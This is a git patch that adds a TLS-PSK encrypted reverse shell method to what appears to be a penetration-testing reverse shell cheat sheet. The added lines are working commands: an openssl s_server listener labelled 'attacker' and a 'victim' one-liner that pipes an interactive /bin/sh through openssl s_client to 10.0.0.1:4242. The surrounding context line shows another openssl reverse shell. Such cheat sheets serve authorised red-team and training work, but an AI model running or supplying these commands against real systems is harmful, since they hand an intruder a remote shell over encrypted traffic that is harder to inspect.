From 2d7d6d6eed40f4a8d02e155a84b5671267459625 Mon Sep 17 00:00:00 2001
From: Artiom Mocrenco <artiom.mocrenco@gmail.com>
Date: Wed, 8 Jul 2020 17:01:38 +0300
Subject: [PATCH] Add TLS-PSK OpenSSL reverse shell method

---
 Methodology and Resources/Reverse Shell Cheatsheet.md | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 0362a8a..4384d00 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md	
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md	
@@ -175,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242
 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
 ```
 
+TLS-PSK (does not rely on PKI or self-signed certificates)
+```bash
+# generate 48-bit PSK
+# use the generated string as a value for the two PSK variables from below
+openssl rand -hex 48 
+# server (attacker)
+export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT
+# client (victim)
+export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE
+```
+
 ### Powershell
 
 ```powershell